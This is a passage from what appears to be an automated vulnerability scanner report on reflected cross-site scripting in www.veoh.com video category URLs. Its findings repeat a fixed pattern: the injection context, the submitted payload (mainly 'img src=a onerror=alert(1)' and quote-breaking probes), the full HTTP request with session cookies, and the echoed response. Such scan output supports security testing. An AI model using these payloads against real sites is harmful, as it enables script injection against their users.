This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20757961gnh48zmSa1adb'%3b90455422d30 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:47 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=42
Content-Length: 94049
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735 was submitted in the REST URL parameter 4. This input was echoed as 81165"><img src=a onerror=alert(1)>17f00c2e735 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure81165"><img%20src%3da%20onerror%3dalert(1)>17f00c2e735/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:36 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 74599
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure81165"><img src=a onerror=alert(1)>17f00c2e735/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9 was submitted in the REST URL parameter 4. This input was echoed as 1f894<img src=a onerror=alert(1)>9de463e3ec9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure1f894<img%20src%3da%20onerror%3dalert(1)>9de463e3ec9/watch/v20758438BTte3QQz HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=70
Content-Length: 74555
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure1f894<img src=a onerror=alert(1)>9de463e3ec9"}</textarea> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d86c9'%3b11294ec602e was submitted in the REST URL parameter 6. This input was echoed as d86c9';11294ec602e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20758438BTte3QQzd86c9'%3b11294ec602e HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:52 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=60
Content-Length: 94049
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 218d8'%3b167cb8b726a was submitted in the REST URL parameter 6. This input was echoed as 218d8';167cb8b726a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/action_adventure/watch/v20759029Mf8YXNhr218d8'%3b167cb8b726a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:35 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 94329
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a was submitted in the REST URL parameter 4. This input was echoed as 1b947"><img src=a onerror=alert(1)>1a22388a0a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f1b947"><img%20src%3da%20onerror%3dalert(1)>1a22388a0a HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:34:23 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=75
Content-Length: 57867
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/action_adventure4957f1b947"><img src=a onerror=alert(1)>1a22388a0a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 was submitted in the REST URL parameter 4. This input was echoed as 265a6<img src=a onerror=alert(1)>59b74d09c35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f265a6<img%20src%3da%20onerror%3dalert(1)>59b74d09c35 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:07 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=97
Content-Length: 57833
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","kw":"","sortBy":"mostviewed","bcategory":"category_action_adventure4957f265a6<img src=a onerror=alert(1)>59b74d09c35"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the name of an HTML tag attribute. The payload f915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7 was submitted in the REST URL parameter 4. This input was echoed as f915b><img src=a onerror=alert(1)>991aab001b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f"><img%20srcf915b><img%20src%3da%20onerror%3dalert(1)>991aab001b7=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:35:18 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=40
Content-Length: 76933
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <img srcf915b><img src=a onerror=alert(1)>991aab001b7=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35 was submitted in the REST URL parameter 4. This input was echoed as ddc51<img src=a onerror=alert(1)>095a10c6f35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/ddc51<img%20src%3da%20onerror%3dalert(1)>095a10c6f35=a%20onerror=alert(1)>b411440d815/watch/v18978294NGnK88j8/javascript:Search.searchng('') HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:37:14 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=93
Content-Length: 76573
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_ddc51<img src=a onerror=alert(1)>095a10c6f35=a onerror=alert(1)> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 94381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee was submitted in the REST URL parameter 4. This input was echoed as 94381<img src=a onerror=alert(1)>52a0288ccee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d81594381<img%20src%3da%20onerror%3dalert(1)>52a0288ccee/watch/v18978294NGnK88j8/a HTTP/1.1
Host: www.veoh.com
Proxy-Connection: keep-alive
Referer: http://www.veoh.com/browse/videos/category/action_adventure4957f%22%3E%3Cimg%20src%3da%20onerror%3dalert(1)%3Eb411440d815/watch/v18978294NGnK88j8/x26amp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utmv=; vvt="1&Fri, 04 Feb 2011 20:53:09 GMT"; __qca=P0-1750536792-1296766390251; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; JSESSIONID=FA513D5C45F8F3409631CA9302C4270B; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmb=91933981.1.10.1296766388; __utmc=91933981
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d was submitted in the REST URL parameter 4. This input was echoed as cd065<img src=a onerror=alert(1)>a077cbaf92d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationcd065<img%20src%3da%20onerror%3dalert(1)>a077cbaf92d/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:51 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=18
Content-Length: 74501
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <textarea id="pageContextJson" cols="1" rows="1">{"sitename":"videos","mature":"false","sexy":"false","kw":"","sortBy":"mostviewed","bcategory":"category_animationcd065<img src=a onerror=alert(1)>a077cbaf92d"}</textarea> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a was submitted in the REST URL parameter 4. This input was echoed as ba538"><img src=a onerror=alert(1)>0ced7d2746a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/animationba538"><img%20src%3da%20onerror%3dalert(1)>0ced7d2746a/watch/v20767083WdnCj7gW HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:38:28 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=12
Content-Length: 74545
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... <option value="/browse/videos/category/animationba538"><img src=a onerror=alert(1)>0ced7d2746a/sort/most viewed" selected="selected"> ...[SNIP]...
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14c7e'%3b1844de9a605 was submitted in the REST URL parameter 6. This input was echoed as 14c7e';1844de9a605 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /browse/videos/category/animation/watch/v20767083WdnCj7gW14c7e'%3b1844de9a605 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;
Response
HTTP/1.1 404 Not Found
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:39:01 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 93332
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1 was submitted in the REST URL parameter 4. This input was echoed as fcae8"><img src=a onerror=alert(1)>26d66e628b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /browse/videos/category/celebrity_and_showbizfcae8"><img%20src%3da%20onerror%3dalert(1)>26d66e628b1/watch/v20767641DYmkkC9T HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
